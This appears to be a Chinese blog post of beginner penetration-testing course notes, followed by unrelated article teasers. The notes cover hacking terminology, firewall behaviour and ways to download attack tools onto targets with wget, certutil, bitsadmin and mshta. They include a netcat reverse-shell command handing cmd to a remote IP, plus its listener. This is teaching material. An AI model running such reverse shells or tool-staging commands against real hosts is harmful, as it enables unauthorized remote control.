小迪安全第一天

news2025/5/25 8:12:21

一、常用的专业术语

参考:
https://www.cnblogs.com/sunny11/p/13583083.html

  • POC(proof of concept)验证漏洞的代码
  • EXP(exploit) 利用对一段漏洞代码的利用
  • Playload:有效载荷,当利用exploit成功后如何通过一个管道把这个权限给到你,在真正目标系统执行的代码或指令
  • Shellcode:shell代码是playload的一类,建立正向/反向shell而得名。
  • 后门/webshell:入侵者通过某种手段攻破了目标主机,可以在对方系统中植入某段程序代码以达到访问控制/查看控制该主机。
  • 木马(攻击者):伪装称正常的程序,当该程序运行时,获取用户所有的权限达到控制该用户主机
  • 病毒:简单来说就是破坏性的程序,中了病毒就开始破坏你的电脑
  • 反弹:将权限移交到其它服务器或地址上去,用其它来实施控制
    跳板:相当于一个中介,用于连接另一个主机/服务器,一个具有辅助作用的机器,利用这个主机作为一个间接工具,来入侵其他主机,一般和肉鸡连用。
  • 黑白盒测试:黑盒测试只有一个目标没有源代码,百盒则相反。
  • 社会工程学:根据人性的弱点,一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。通俗而言是指利用人的社会学弱点实施网络攻击的一整套方法论,其攻击手法往往出乎人意料
  • 撞库:利用网络中某云等泄露的数据库,包含着用户的各种信息,在某些搭建的社工库中可以输入某人的电话邮箱等关键信息来查看某人的状态和某些密码。
  • ATT&CK:根据此MITRE ATT&CK® 可以查某些漏洞等转悠名词,以此来详细写渗透报告。

二、演示案列

基础案例1:操作系统-用途&命令&权限&用户&防火墙

  • 个人计算机&服务器用机

  • Windows&linux常见命令 网站参考:【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇
    渗透测试中常用的命令-CSDN博客

  • 文件权限&服务权限&用户权限等:为完成某种情况,需要对权限提升从而得到某个文件的内容。

  • 系统用户&用户组&服务用户等分类

  • 自带防火墙出站&入站规则策略协议

一般电脑默认的防火墙实行宽出进严
在web攻防中因为使用的时ip等协议,使得防火墙对这些协议是默认允许的基本没有什么阻碍,防火墙的策略是允许这些行为的
在进行内网渗透测试时,不仅有web上的协议还有其它等协议,正是防火墙要阻止的协议,意义说防火墙起到了真正的左右。

实用案例1:文件上传下载-解决无图形化&解决数据传输

  • 解决无图形其实都是命令行,如后期要上传攻击的工具到对方服务器上运行以命令的形式上传。
    网站工具及命令输入形式等:ywhack.com
  • Linux:wget curl python ruby perl java等

自己搭建一个网站里面有各种工具资料通过wget命令等下载到对方主机上去。

  • Windows:powershell certutil bitsadmin msiexec mshta rundll32等

在widows下载过程中可能下载失败,原因可能在当前用户下没有权限,可以换到c:\temp下

实用案列2:反弹shell命令-解决数据回显&解决数据通讯

  • 有些渗透测试中大部分是没有回显的,有些工具通过命令发送过去是否成功自己并不知道,
  • Useradd用户名 passwd 用户密码 测试linux系统添加用户或修改密码命令交互回显问题

结合案列1:防火墙绕过-正向连接&反向连接&内网服务器

  • 反弹shell在windows下的命令 :nc -e cmd 192.12.4.5
    445意思是把cmd命令的权限移交给192.12.4.5 445的服务器上,在此服务器上可以使用nc -lvvp 445 来监听455端口

内网: 内网——> xiaodi8 Xiaodi8 !->内网 解决方案:因为路由器中有端口转发/端口映射的功能,在路由器中做一个策略,把武器通过指定端口交给主机,简单解释为外网找到内网的网关(路由器)的端口从而将数据交到指定主机上去。

防火墙: Xiaodi8<->aliyun Xiaodi防火墙->aliyun aliyun!->xiaodi8防火墙 解决方案:正向连接/反向连接

#结合案列:fofa拿下pikachu服务器 文件下载&反弹shell

总结

今日学习之思维导图
在这里插入图片描述

学习总结来源于:小迪安全

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1355830.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

集群渲染是?渲染农场是?两者与云渲染关联是什么

在数字化浪潮不断推进的当下&#xff0c;渲染技术在多个行业中发挥着至关重要的作用&#xff0c;尤其体现在电影制作、建筑可视化以及电子游戏开发等领域。在众多渲染技术中&#xff0c;集群渲染、渲染农场以及云渲染特别受到业界的重视。本文旨在阐述这些概念的含义以及它们之…

蛇目标检测数据集VOC格式750张

蛇&#xff0c;一种令人着迷而又神秘的爬行动物&#xff0c;以其独特的外貌和习性&#xff0c;成为了自然界中的一道独特风景。 蛇的外观光滑细长&#xff0c;身体呈流线型&#xff0c;鳞片覆盖全身&#xff0c;使得它们能够在地面上或树枝间快速移动。大多数蛇拥有尖锐的毒牙…

小目标识别任务算法

小目标识别是计算机视觉领域中的一个挑战性任务&#xff0c;主要是指在图像或视频中检测和识别尺寸相对较小的目标。 以下是一些常见的小目标识别算法&#xff1a; Faster R-CNN&#xff1a; Faster R-CNN是一种基于深度学习的目标检测算法&#xff0c;通过引入区域建议网络&am…

算法导论复习——CHP22 基本图算法

图的表示 邻接矩阵和邻接表 稀疏图一般用邻接表表示&#xff08;稀疏图&#xff1a;边数|E|远小于的图 &#xff09; 稠密图更倾向于用邻接矩阵表示 (稠密图&#xff1a;边数|E|接近的图) 邻接矩阵可用于需要快速判断任意两个结点之间是否有边相连的应用场景。 如果用邻…

VSCode远程连接centos

1 下载remote -ssh插件 2 在上方打开命令面板&#xff0c;输入>,再输入ssh&#xff0c;选择设置 Remote-SSH:Settings 那行 3 勾选下面这个选项 4 点击加号旁边的那个齿轮&#xff0c;选择.ssh\config ,配置连接信息&#xff0c;保存好后&#xff0c;刷新。 4 连接centos,然…

springBoot2.3-简单了解依赖管理、自动配置

一、自动依赖管理 基本介绍&#xff1a;springBoot提前帮我们写好了极多的依赖及版本号&#xff0c;当然我们也可以自定义依赖项与版本号。 1.1 简单介绍 1、在入门案例中&#xff0c;springBoot的maven中引入了parent父工程 2、ctrl 左键 parent&#xff0c; 发现里边还有…

图像融合算法

图像融合是将两个或多个图像或图像的特定部分合并在一起的过程。这可以通过各种图像融合算法来实现&#xff0c;这些算法可以用于不同的应用&#xff0c;如图像编辑、计算机视觉和医学图像处理。以下是一些常见的图像融合算法&#xff1a; 透明度融合&#xff08;Alpha Blendi…

智能洗地机哪款最好用?智能洗地机推荐

洗地机是一种非常实用的家居清洁设备&#xff0c;可以有效地清理地面上的污垢和灰尘&#xff0c;给人们的生活带来了极大的便利性。那么洗地机哪个牌子最好用呢?市场上出现了越来越多的洗地机品牌&#xff0c;究竟哪一款智能洗地机更好用呢?本文将为大家简单介绍一下! 在选择…

这份江苏“最牛”医院和科室名单,我们核实过了

这份榜单不仅评出了全国100家最具科技影响力医院 还公布了25个医院学科影响力排行 那么&#xff0c;江苏哪些医院和科室入榜了呢&#xff1f; ▲戳大图更清晰 具体到学科排名 是这样的 心血管病 ▲戳大图更清晰 呼吸病学 ▲戳大图更清晰 消化病学 ▲戳大图更清晰 血液病…

接口和抽象类有什么共同点和区别?

共同点&#xff1a; 都不能被实例化。都可以包含抽象方法。都可以有默认实现的方法&#xff08;Java 8 可以用 default 关键字在接口中定义默认方法&#xff09;。 区别&#xff1a; 接口主要用于对类的行为进行约束&#xff0c;你实现了某个接口就具有了对应的行为。抽象类…

halcon 缺陷检测--形状匹配+差分

一、前言 本篇主要总结使用halcon 做缺陷检测的一个常用思路&#xff0c;当一张图片拍摄多个待检测工件&#xff0c;常用方法是由预先建立好的模版图像&#xff0c;采用 形状匹配查分方法抠下每个工件&#xff0c;逐个检测。 形状匹配比灰度值匹配要更为可靠 二、代码 代码是对…

目标管理(案例)

介绍 本篇Codelab将介绍如何使用State、Prop、Link、Watch、Provide、Consume管理页面级变量的状态&#xff0c;实现对页面数据的增加、删除、修改。要求完成以下功能&#xff1a; 实现一个自定义弹窗&#xff0c;完成添加子目标的功能。实现一个可编辑列表&#xff0c;可点击指…

JUC AQS(AbstractQueuedSynchronizer)

文章目录 AQS &#xff08;AbstractQueuedSynchronizer^1.5^&#xff09;CLH 锁队列AbstractQueuedSynchronizer 成员变量说明AbstractQueuedSynchronizer.Node 源码CLH 队列原理图入队逻辑方法出队逻辑方法 继承 AQS 需要实现的几个方法AQS 对象序列化ReentrantLock 源码解析R…

Day7 vitest 之 vitest配置第三版

项目目录 runner Type: VitestRunnerConstructor Default: node, 当运行test的时候 benchmark,当运行bench测试的时候 功能 自定义测试运行程序的路径。 要求 应与自定义库运行程序一起使用。 如果您只是运行测试&#xff0c;则可能不需要这个。它主要由library作者使用 …

kubernetes(K8s)的使用和常用命令

K8S kubernetes&#xff0c;由于k和s之间有8个字符&#xff0c;所以简称k8s&#xff0c;是一个全新的基于容器技术的分布式架构领先方案&#xff0c;是谷歌严格保密十几年的秘密武器----Borg系统的一个开源版本&#xff0c;于2015年7月发布第一个正式版本&#xff0c;它的本质…

HTML如何设置多图片上传,并限制格式类型

在HTML如何设置多图片上传&#xff0c;并限制格式类型为jpg和png格式。 <input type"file" name"fileInput" id"fileInput"> 上面这行代码&#xff0c;只支持单个文件上传&#xff0c;且不支持文件类型过滤&#xff0c;在实际开发过程中&…

HTML5+CSS3+Vue小实例:彩色圆环溶解加载动画

实例:彩色圆环溶解加载动画 技术栈:HTML+CSS+Vue.js 效果: 源码: 【HTML】 <!DOCTYPE html> <html lang="zh-CN"> <head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge&…

「HarmonyOS」验证码多TextInput输入框焦点自动跳转问题

需求背景&#xff1a;需要做一个多输入框的验证码模块&#xff0c;输入验证码时输入后光标会自动跳转至下一个输入框&#xff0c;删除验证码时会自动删除上一个输入框内容&#xff0c;并且光标跳转至上一个输入框内。6位验证码全部输完后进行登录请求 具体样式如下图&#xff1…

RFID数据中心智能资产管理系统

数据中心机房承担着保障企业关键数据处理的重要责任&#xff0c;机房的日常管理直接关系到整体机房的日常维护和运行安全&#xff0c;数据资产管理中心在监管机房各部分设备的运行情况、维护数据中心的资产方面发挥着重要的作用。 成功的数据中心机房管理不仅需要选择高可靠性…

理解UML中的依赖关系

理解UML中的依赖关系 在面向对象的设计中&#xff0c;理解各种类之间的关系对于构建一个清晰、可维护的系统至关重要。UML&#xff08;统一建模语言&#xff09;为我们提供了一种可视化这些关系的方式。今天&#xff0c;我们将深入探讨UML中的依赖关系&#xff08;Dependency&a…